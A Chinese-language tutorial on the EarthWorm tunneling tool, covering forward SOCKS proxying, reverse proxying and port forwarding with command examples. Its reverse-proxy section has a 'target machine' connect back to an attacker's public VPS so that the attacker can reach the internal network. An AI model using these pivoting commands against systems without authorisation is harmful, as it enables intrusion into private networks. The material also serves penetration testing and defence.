内网代理工具--EarthWorm

一、简介

EarthWorm是内网穿透的神器，拥有三项功能正向代理，反向代理，端口转发。

为实现这些功能，EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave。

从三项功能的角度可以这样划分

功能名称	对应模块
正向代理	ssocksd
反向代理	rcsocks,rssocks
端口转发	lcx_listen,lcx_slave,lcx_tran

二、正向代理

一条命令即可

./ew -s ssocksd --listenport 1080
or
./ew -s ssocksd -l 1080

三、反向代理

此处需要使用两个功能模块rcsosks，rssocks

在很多场景，无法直接连接需要当做代理的主机，那么怎么解决这个问题呢？EarthWorm的解决方法十分简单，考虑到我们无法直接连接代理主机，但是代理主机可以主动连接我们，因此需要等待该主机主动连接承担代理任务。而这就是rccosks，rssocks的命令设计想法。rcsocks建立本地代理客户端，指定本地监听反弹的端口，rssocks建立本地代理服务端，并指定建立服务端后主动连接的远程主机的IP和端口。

第1步：在公网的VPS上执行如下命令：

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &

该命令的意思是说公网机器监听1080和1024端口。等待攻击者机器访问1080端口，目标机器访问1024端口。

第2步：目标机器执行如下命令：

./ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024

其中-d参数的值为刚刚的公网IP

第3步：攻击者机器通过proxychains或浏览器设置Socks5代理访问目标内网服务

四、端口转发

该功能涉及三个功能模块：lcx_listen,lcx_slave,lcx_tran这三个模块可以建立任意形式的端口转发，可以将内网最深处的主机端口转发出来。

常见的使用命令组合如下：

./ew -s lcx_listen -l 1080 -e 8888
./ew -s lcx_tran -l 1080 -f [connIP] -g 8888

数据流向 local:1080 < — > local:8888 < — > remoteIP:1080

用于实现将本地端口转发到远程可直接连接的某主机的端口，

./ew -s lcx_listen -l 1080 -e 8888
./ew -s lcx_slave -d [ref_ip] -e 1080 -f [connIP] -g 1080

数据流向 connIP:8888 < — > connIP:1080 < — > ref_ip:1080

还可以有许多组合方式，需要时进行总结。